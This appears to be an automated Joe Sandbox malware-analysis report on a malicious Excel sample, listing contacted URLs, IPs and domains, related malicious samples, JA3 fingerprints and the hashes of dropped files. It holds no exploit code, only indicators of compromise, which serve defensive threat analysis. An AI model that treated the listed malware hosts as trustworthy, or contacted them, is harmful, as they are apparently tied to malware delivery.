                                                                                                                                            https://api.cortana.ai221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  signifysystem.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  fcventasyservicios.clUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412362
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:16:45:18
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 15s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:54402971_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:18
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.expl.evad.winXLS@5/7@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.5854402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                    46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                      192.185.32.23254402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                        afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                              8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          signifysystem.comafdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          fcventasyservicios.cl54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232

                                                                                                                                                                                          ASN

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          UNIFIEDLAYER-AS-1US54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.254.185.244
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.232.222.43
                                                                                                                                                                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                          • 67.20.76.71
                                                                                                                                                                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.241.169.22
                                                                                                                                                                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.129.32
                                                                                                                                                                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.241.62.63
                                                                                                                                                                                          in.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.241.244.112
                                                                                                                                                                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.144.13.239
                                                                                                                                                                                          UNIFIEDLAYER-AS-1US54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.254.185.244
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.232.222.43
                                                                                                                                                                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                          • 67.20.76.71
                                                                                                                                                                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.241.169.22
                                                                                                                                                                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.129.32
                                                                                                                                                                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.241.62.63
                                                                                                                                                                                          in.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.241.244.112
                                                                                                                                                                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 162.144.13.239

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                          Cotizaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                          • 192.185.39.58

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\221B862E-D5CA-4C51-AEC1-C42AA63B593F
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):134558
                                                                                                                                                                                          Entropy (8bit):5.368379092220403
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:HcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:sEQ9DQW+zPXO8
                                                                                                                                                                                          MD5:B1956D8E751165B30565A236C904D39A
                                                                                                                                                                                          SHA1:C6B51661CF77F0CF3DC9095B489740F6347DC486
                                                                                                                                                                                          SHA-256:67CBCC301364045B3D9536462A18EC6F805E9606129E27DD67AAD892FDE65D5D
                                                                                                                                                                                          SHA-512:E5660EDE6A6BA3C0E1938F838ECDB48925460B0C25129096B0BA65BC75AA7E65524FD8B1F65882A9B8C0CEC6DF7654266FC7D09EE418CDCB3DBDEAA1E472524C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T14:46:11">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9CB40000
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):81549
                                                                                                                                                                                          Entropy (8bit):7.910200256486616
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:sjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJM1:g+nHSD8YZo/Uh0ZymYQ0y7FALe1
                                                                                                                                                                                          MD5:BC17388D6280148DE3C95D7B64060606
                                                                                                                                                                                          SHA1:14D245171606F8D4E8317F87F384332D6A7967AC
                                                                                                                                                                                          SHA-256:608E2859FCDE9DB6D3CA582269B42CC6D5E313264B0AA2F0244649BAE4254045
                                                                                                                                                                                          SHA-512:029A58B143547F7398B38C963212705E68C33F76235A35545240ED7C6FC70BD5B1A22C45D19B0754CDA7DE829A49339DE4B427669A7D9A3B45926CB20192367E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\54402971_by_Libranalysis.LNK
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Wed May 12 13:46:15 2021, atime=Wed May 12 13:46:15 2021, length=177152, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2250
                                                                                                                                                                                          Entropy (8bit):4.730354934706689
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:8PiDnXOEEwslNj0OE6B6pPiDnXOEEwslNj0OE6B6:8PiTFKlNQF6KPiTFKlNQF6
                                                                                                                                                                                          MD5:47FA65264A8089908531BC7EFB763776
                                                                                                                                                                                          SHA1:3889EC6FB2531EB67EA8FDCDD747555F1EB2CD15
                                                                                                                                                                                          SHA-256:688D4BF785F26F454DA852B68D63AA1DE3447517A5D0644D70FB9B00CA626962
                                                                                                                                                                                          SHA-512:77E02C55CEFDF667650FA213A2A350FDBA17933854AC039FE1C967A9F64AF3A487471A06184EB8D76C2B40DF6E6E906222E0442FFCE9D7B71F2AC5C903C3EC92
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: L..................F.... ...8Z/S.....g..=G...g..=G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.u....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.u....#J.......................j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.u.....Y..............>.....i.`.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.u .544029~1.XLS..j......>Q{<.R.u.....V........................5.4.4.0.2.9.7.1._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\54402971_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.5.4.4.0.2.9.7.1._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......932923...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed May 12 13:46:15 2021, atime=Wed May 12 13:46:15 2021, length=16384, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):904
                                                                                                                                                                                          Entropy (8bit):4.67401623413444
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:89kXU/vduCH2KOZxO4D4Zc+WrjAZ/DYbDlSeuSeL44t2Y+xIBjKZm:85ivSZ+AZbcDL7aB6m
                                                                                                                                                                                          MD5:402828AE8A593DBF7E448C26ABF285EB
                                                                                                                                                                                          SHA1:87B85C015AD81F8B6B3894F607DD3BEE9D43D4A3
                                                                                                                                                                                          SHA-256:57A58F873B8A33F866A6B7E4F21FDA05647FFF92596C28A79AD131B487741595
                                                                                                                                                                                          SHA-512:BC79BC707DB5222EF3D7B1735BC4B1542653CDF4CCD03034AB01B43FBBF48D7820D2E3442159CCB1B957C796C062EA01997F9F0E5FDE13837CB17356BE32FDE5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: L..................F.............-...hd.=G..'.b.=G...@......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.u....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.u....#J.......................j.o.n.e.s.....~.1......R.u..Desktop.h.......N...R.u.....Y..............>.......\.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......932923...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):125
                                                                                                                                                                                          Entropy (8bit):4.767349509094217
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:oyBVomMI9XpGUwSLMp6lKXpGUwSLMp6lmMI9XpGUwSLMp6lv:dj6WNmNbWNf
                                                                                                                                                                                          MD5:79DA9611CE7422E6A1A8DEB0B22758B9
                                                                                                                                                                                          SHA1:0412CA7285A7AED9ABDE4906824173A0B713AFD1
                                                                                                                                                                                          SHA-256:AAA617B7D6F1FF3146A4A2E70985FD9DF6556680EA52E1A31BFB7190D3F5C35E
                                                                                                                                                                                          SHA-512:93AACE69C2B7551C682108469EDCE993553CA4FCDF56BDF8336941471222EE58DBE9B65F418A434F6672BAC8443E193E73A8EA46066F9B8F17BAB832461B0EE2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: Desktop.LNK=0..[xls]..54402971_by_Libranalysis.LNK=0..54402971_by_Libranalysis.LNK=0..[xls]..54402971_by_Libranalysis.LNK=0..
                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                          C:\Users\user\Desktop\BDB40000
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):228873
                                                                                                                                                                                          Entropy (8bit):5.616369432240079
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:K7NiRdSD8YNoTU90udfzn3bP0X7vrPlsrXvLlL7Ld7NiuN:LRdTrTU9Z1yuN
                                                                                                                                                                                          MD5:A5AB343171041848A42C2A0EB23DB166
